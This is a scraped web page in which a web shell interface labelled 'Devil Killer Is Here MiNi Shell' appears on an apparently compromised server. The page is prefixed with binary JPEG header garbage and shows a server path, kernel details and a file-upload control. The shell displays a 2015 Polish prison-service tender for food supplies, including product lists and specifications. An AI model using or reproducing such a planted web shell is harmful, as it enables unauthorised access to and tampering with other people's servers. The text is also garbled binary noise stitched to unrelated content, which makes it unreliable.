JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150130/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150130/13371-N-2015.html

<p class="kh_header"><b>Popów: Dostawy ogólnych artykułów  spożywczych w  tym  zup, sosów,  wody i soków oraz produktów mącznych dla OSSW w Kulach  Oddział Zamiejscowego w Sulejowie.</b><br>
<b>Numer ogłoszenia: 13371 - 2015; data zamieszczenia: 30.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Szkolenia Służby Więziennej w Kulach , Kule 2, 42-110 Popów, woj. śląskie, tel. 034 3104030, faks 034 3103653.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Ośrodek Szkolenia Służby Więziennej w Kulach.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy ogólnych artykułów  spożywczych w  tym  zup, sosów,  wody i soków oraz produktów mącznych dla OSSW w Kulach  Oddział Zamiejscowego w Sulejowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są - dostawy ogólnych artykułów  spożywczych w  tym  zup, sosów,  wody i soków oraz produktów mącznych dla OSSW w Kulach  Oddział Zamiejscowego w Sulejowie. 
zadanie    nr 1 - dostawy  artykułów spożywczych dla OSSW  w Kulach Oddział Zamiejscowy w Sulejowie.
1	Kasza jęczmienna pęczak	kg	150,
2	Kasza jęczmienna 	kg	50,
3	Kasza manna	kg	30,
4	Makaron gruby	kg	500,
5	Makaron nitki	kg	100,
6	Mąka pszenna	kg	250,
7	Mąka ziemniaczana	kg	30,
8	Płatki czekoladowe	kg	150,
9	Płatki kukurydziane	kg	120,
10	Ryż biały	kg	70,
11	Ryż paraboliczny 	kg	200,
12	Groch łuskany połówki 	kg	100,
13	Fasola biała Jaś 	kg	230,
14	 Kasza gryczana	kg	150,
15	 Zacierki	kg	30,
16 	Groszek ptysiowy	kg	40,
17 	Grzanki	kg	40,
18	 Herbata expresowa	kg	100,
19 	Herbata expresowa	kg	10
20	 Napój kakaowy 	kg	24,
21	 Kawa naturalna	kg	10,
22	 Kawa rozpuszczalna	kg	20,
23	 Ketchup	kg	300,
24 	Cukier	kg	1300,
25 	Miód porcjowany	kg	30,
26	 Majonez dekoracyjny	l	200,
27 	Żurek w płynie 	l	150,
28 	Musztarda delikatesowa stołowa 	kg	150,
29	 Olej roślinny popularny	l	600,
30	 Śliwki suszone kalifornijskie	kg	10,
31	 Rodzynki	kg	10,
32 	Wafelek w czekoladzie	szt.	3000,
33 	Rogal z nadzieniem	kg	90,
34	 Paluszki solone	kg	5,
35	 Ananas w syropie	kg	90,
36	 Brzoskwinie w syropie	kg	60,
37	 Groszek konserwowy	kg	60,
38	 Koncentrat buraczany	l	10,
39	 Koncentrat pomidorowy 	kg	200,
40	 Kukurydza konserwowa	kg	60,
41	 Ogórek kiszony	kg	100,
42	 Ogórek konserwowy	kg	600,
43	 Papryka konserwowa	kg	500,
44	 Pieczarki marynowane	kg	80,
45	Seler konserwowy łagodny	kg	80,
46	 Dżem niskosłodzony	kg	450,
47	 Kapusta kiszona	kg	800,
48   	Chrzan tarty	kg	10,
49 	Fasola konserwowa czerwona	kg	50,
50 	Przecier ogórkowy 	kg	100,
51 	Szczaw konserwowy	kg	60,
52	  Pasztet drobiowy	kg	150,
53 	Konserwa mięsna	kg	60,
54	  Przyprawa do potraw uniwersalna	kg	150,
55	 Gałka muszkatołowa	kg	1,
56	  Żelatyna spożywcza	kg	3,
57 	Cynamon 	kg	1,
58	 Delikata do ryb	kg	6,
59 	Delikata do kurczaka	kg	10,
60	  Liść laurowy	kg	1,
61  	Majeranek	kg	3,
62	  Ocet spirytus. 10% 	l	30,
63  	Papryka mielona słodka	kg	1,
64  	Pieprz czarny mielony	kg	10,
65	  Pieprz czarny cały 	kg	3,
66 	Przyprawa do zup w płynie uniwersalna typu Winiary	kg	200,
67	  Ziele angielskie 	kg	5,
68	 Kwasek cytrynowy	kg	3,
69  	Przyprawa curry	kg	3,
70	 Sól jodowana 	kg	350,
71  	Czosnek granulowany	kg	1,
72 	Cukier waniliowy	kg	1,
73	 Syrop owocowy	l	30,
74	  Herbatniki	kg	50,
75	 Ciastka kruche	kg	50,
76	 Sałatka szwedzka	kg	350,
77	Sałatka wielowarzywna	kg	350,
78 	Sałatka obiadowa	kg	350,
79	 Kapusta czerwona konserwowa	kg	350,
80	  Sałatka z buraczków 	kg	300
81 	 Ćwikła z chrzanem	kg	50,
82 	Jabłka prażone	kg	60,
83  	Grzyby suszone	kg	3,
84	 Galaretka	kg	50,
85	 Budyń	kg	50,
zadanie   nr 2 - dostawy  zup i sosów dla OSSW w Kulach  Oddział Zamiejscowy w Sulejowie
1 	Barszcz biały Knorr lub równoważny	kg	10,
2	 Sos pieczeniowy Knorr lub równoważny	kg	5,
3  	Sos grzybowy Knorr lub równoważny	kg	5,
4	  Sos z zielonym pieprzem Knorr lub równoważny	kg	8,
5	 Sos do makaronu Carbonara Knorr lub równoważny	kg	15,
6	  Sos do makaronu Bolognese Knorr lub równoważny	kg	20,
7  	Bulion grzybowy	kg	2,
8 	Bulion drobiowy Knorr lub równoważny	kg	10,
9  	Bulion wołowy Knorr lub równoważny	kg	10,
10	  Sosy sałatkowe Knorr lub równoważne	kg	15,
11	 Sosy deserowe Carte d or lub równoważne	kg	15,
12	 Zupa pieczarkowa Knorr lub równoważna	 kg	15,
13	  Zupa porowa Knorr lub równoważna	kg	15,
14  	Zupa brokułowa Knorr  lub równoważna	kg	15,
15	 Zupa cebulowa  Knorr lub równoważna	kg	10,
16	 Krem z borowików Knorr lub równoważna	kg	15,
zadanie   nr  3 - dostawy wody i soków  OSSW w Kulach  Oddział Zamiejscowy w Sulejowie zadanie
1	Naturalna woda mineralna niegazowana  gazowana 0,50 litra - litr	800,
2	Naturalna woda mineralna niegazowana gazowana 1,50 litra - litr	2000,
3	Naturalna woda mineralna niegazowana 5 litrów	- litr	3000,
4	Sok owocowy 200 ml - litr  400
5	Napoje owocowe 	litr	- 400
zadanie   nr  4 - dostawy produktów mącznych dla OSSW w Kulach  Oddział Zamiejscowy w Sulejowie 
1	Pierogi	kg	500,
2	Kopytka - kluski ziemniaczane	kg	100,
3	Krokiety	kg	300,
4	Naleśniki	kg	500,
5	Kluski śląskie	kg	100,
6	Kartacze 	kg	300,
7	Kartacze z mięsem	kg	300,
8	Pyzy z mięsem	kg	300,
9	Knedle	kg	200,.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 03.00.00.00-1, 15.80.00.00-6, 15.33.00.00-0, 15.60.00.00-4, 15.87.12.00-6, 15.89.14.00-4, 15.32.10.00-4, 15.98.10.00-8, 15.85.10.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków nastąpi na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków nastąpi na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków nastąpi na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków nastąpi na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków nastąpi na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony i podpisany formularz ofertowy stanowiący załącznik nr 1 do SIWZ. 
Wypełniony i podpisany formularz cenowy w zakresie zadań od 1 - 4 stanowiący załącznik nr 2 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Szkolenia Służby Więziennej w Kulach
Kule 2 
42-110 Popów
Pokój nr 2 i 3 dział kwatermistrzowski pawilon Warta.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.02.2015 godzina 12:00, miejsce: Ośrodek Szkolenia Służby Więziennej w Kulach
Kule 2 
42-110 Popów
Pokój nr 3 sekretariat pawilon Liswarta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawy ogólnych artykułów spożywczych dla OSSW w Kulach Oddział Zamiejscowy w Sulejowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Kasza jęczmienna pęczak	15613000-8	Produkt otrzymany z jęczmienia, struktura i konsystencja- sypka, bez grudek i wilgotności nie większa niż 15,3%, kwasowość mierzona w stopniach nie większa niż 3. Cechy dyskwalifikujące: obce zapachy, posmaki, zanieczyszczenia, objawy pleśnienia, psucia, zawilgocenie, obecność szkodników żywych, martwych oraz ich pozostałości. Opakowanie jednostkowe - 1 kg. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy.	kg	150
2	Kasza jęczmienna 	15613000-8	Produkt otrzymany z jęczmienia, struktura i konsystencja- sypka, bez grudek i wilgotności nie większa niż 15,3%, kwasowość mierzona w stopniach nie większa niż 3. Cechy dyskwalifikujące: obce zapachy, posmaki, zanieczyszczenia, objawy pleśnienia, psucia, zawilgocenie, obecność szkodników żywych, martwych oraz ich pozostałości. Opakowanie jednostkowe - 1 kg. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy.	kg	50
3	Kasza manna	15613300-1	Produkt otrzymany z pszenicy, struktura i konsystencja- sypka, bez grudek i wilgotności nie większa niż 15,3%, kwasowość mierzona w stopniach nie większa niż 3. Cechy dyskwalifikujące: obce zapachy, posmaki, zanieczyszczenia, objawy pleśnienia, psucia, zawilgocenie, obecność szkodników żywych, martwych oraz ich pozostałości. Opakowanie jednostkowe -1 kg. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy. 	kg	30
4	Makaron gruby	15851100-9	Makaron jajeczny (kolanka, łazanki, świderki, muszelki, rurki, wstążki). Produkowany z świeżych jaj i najwyższej jakości mąki ,Cechy dyskwalifikujące: obce posmaki, zapachy (np. stęchły, pleśni, gorzki), zanieczyszczenia mechaniczne i organiczne, objawy pleśnienia, psucia, zawilgocenia, obecność szkodników żywych, martwych oraz pozostałości. Op. Jedn. 250g-2kg. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy.	kg	500
5	Makaron nitki	15851100-9	Makaron jajeczny. Produkowany z świeżych jaj i najwyższej jakości mąki ,Cechy dyskwalifikujące: obce posmaki, zapachy (np. stęchły, pleśni, gorzki), zanieczyszczenia mechaniczne i organiczne, objawy pleśnienia, psucia, zawilgocenia, obecność szkodników żywych, martwych oraz pozostałości. Op. Jedn. 250g-2kg. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy.	kg	100
6	Mąka pszenna	15612100-2	Mąka pszenna typ 500, o zawartości mokrego glutenu co najmniej 25%. Produkt spożywczy, otrzymany przez rozdrobnienie oczyszczonych ziaren pszenicy zwyczajnej, struktura i konsystencja- sypka, rozdrobniona bez grudek, barwa biała z odcieniem żółtym, wilgotność nie większa niż 15,0%, kwasowość mierzona w stopniach nie większa niż 6. Cechy dyskwalifikujące: obce posmaki, zapachy, np.: stęchły, gorzki, zanieczyszczenia mechaniczne i organiczne, cząstki kąkolu, objawy pleśnienia, psucia, zawilgocenie, obecność szkodników żywych, martwych oraz ich pozostałości. Opakowanie jednostkowe- torba papierowa 1kg. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy.	kg	250
7	Mąka ziemniaczana	15623000-1	Skrobia ziemniaczana otrzymana z bulw ziemniaczanych; struktura i konsystencja- sypka, drobnoziarnisty proszek bez grudek , barwa białą. Cechy dyskwalifikujące: obce posmaki, zapachy, np.: stęchły, gorzki, zanieczyszczenia mechaniczne i organiczne, cząstki kąkolu, objawy pleśnienia, psucia, zawilgocenie, obecność szkodników żywych, martwych oraz ich pozostałości. Opakowanie jednostkowe- torba papierowa 500 g-1 kg. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy. 	kg	30
8	Płatki czekoladowe	15613311-1	Płatki zbożowe o smaku czekoladowym, otrzymane przez przetworzenie ziaren zbóż. Struktura i konsystencja- sypka, w postaci drobnych różnokształtnych płatków bez grudek płatki niepokruszone, barwa żółta, smak lekki słodki. Cechy dyskwalifikujące: obce posmaki, zapachy, zanieczyszczenia mechaniczne i organiczne, objawy pleśnienie, psucia, zawilgocenia, obecność szkodników żywych, martwych oraz ich pozostałości. Opakowanie jednostkowe- folia hermetycznie zamknięta ok. 250 g. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy.	kg	150
9	Płatki kukurydziane	15613311-1	Płatki kukurydziane otrzymane przez przetworzenie ziaren kukurydzy. Struktura i konsystencja- sypka, w postaci drobnych różnokształtnych płatków bez grudek płatki niepokruszone, barwa żółta, smak lekki słodki. Cechy dyskwalifikujące: obce posmaki, zapachy, zanieczyszczenia mechaniczne i organiczne, objawy pleśnienie, psucia, zawilgocenia, obecność szkodników żywych, martwych oraz ich pozostałości. Opakowanie jednostkowe- folia hermetycznie zamknięta ok. 250 g. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy.	kg	120
10	Ryż biały	15614100-6	Ryż długoziarnisty. Cechy dyskwalifikujące: obce zapachy, posmaki, zanieczyszczenia, objawy pleśnienia, psucia, zawilgocenie, obecność szkodników żywych, martwych oraz ich pozostałości. Opakowanie jednostkowe - 1 kg	kg	70
11	Ryż paraboliczny 	15611000-4	Ryż paraboliczny długoziarnisty, parzony. Cechy dyskwalifikujące: obce zapachy, posmaki, zanieczyszczenia, objawy pleśnienia, psucia, zawilgocenie, obecność szkodników żywych, martwych oraz ich pozostałości. Opakowanie jednostkowe - 1 kg. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy.	kg	200
12	Groch łuskany połówki 	03212213-6	Op.jedn.400g-1kg. Bez obcych zapachów , szkodników i uszkodzeń mechanicznych. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy. 	kg	100
13	Fasola biała Jaś 	03221210-1	Surowiec krajowy. Op. Jedn. 400g -1kg. Bez obcych zapachów , szkodników i uszkodzeń mechanicznych. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy. 	kg	230
14	Kasza gryczana	15613000-8	Produkt otrzymany z gryki, struktura i konsystencja- sypka, bez grudek i wilgotności nie większa niż 15,3%, kwasowość mierzona w stopniach nie większa niż 3. Cechy dyskwalifikujące: obce zapachy, posmaki, zanieczyszczenia, objawy pleśnienia, psucia, zawilgocenie, obecność szkodników żywych, martwych oraz ich pozostałości. Opakowanie jednostkowe - 1 kg. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy.	kg	150
15	Zacierki	15851100-9	Makaron jajeczny zacierka. Skład: mąka pszenna, woda, jaja nie mniej niż 9% (2 jaja /1 kg mąki). Op. Jedn. 250 -500g. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy. 	kg	30
16	Groszek ptysiowy	15820000-2	Op. Jedn. 100g - 1 kg. Składniki: mąka psz. tłuszcz roślinny, sól, jaja w proszku, mleko odtłuszcz. w proszku, drożdże. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy.	kg	40
17	Grzanki	15821000-9	Op. jedn. 100g -1kg. Grzanki ziołowo-czosnkowe. Składniki: chleb pszenny ( mąka pszenna, tłuszcz roślinny, sól, drożdże), tłuszcz roślinny, aromaty. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy.	kg	40
18	Herbata expresowa	15864100-3	Herbata expresowa - torebki w kopertkach i ze sznureczkiem. Op. Podst.2g Op. Zbiorcze 50g, 100g, 200g.	kg	100
19	Herbata expresowa	15864100-3	Herbata expresowa - torebki bez sznureczka Op. Podst.1,4g Op. Zbiorcze 28g, 70g, 140g.	kg	10
20	Napój kakaowy 	15841000-5	Kakao rozpuszczalne o mocno czekoladowym smaku z witaminami i składnikami mineralnymi. Op.jedn.300g. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy.	kg	24
21	Kawa naturalna	15861100-2	Kawa naturalna 100% pakowana próżniowo, mielona. Op. jedn. 100g -250g. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy.	kg	10
22	Kawa rozpuszczalna	15861000-1	Kawa rozpuszczalna naturalna 100%, aglomerowana. Op. jedn. 100g - 200g. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy. 	kg	20
23	Ketchup	15871230-5	Ketchup o smaku łagodnym. Op. jedn. 400-500g. Skład: koncentrat pomidorowy nie mniej niż 37%, woda, cukier, ocet, skrobia mody. Sól. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy.	kg	300
24	Cukier	15831200-4	Cukier biały. Op. jedn. 1 kg. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy. 	kg	1300
25	Miód porcjowany	15831600-8	Miód pszczeli nektarowy wielokwiatowy NK. Op.jedn.25g. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy.	kg	30
26	Majonez dekoracyjny	15871273-8	Majonez dekoracyjny. Składniki: olej roślinny, żółtko jaja nie mniej niż 6,0%, ocet, musztarda (woda, gorcz. ocet, sól, cukier).Typu  Winiary Op. jedn. 400-800ml. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy.	l	200
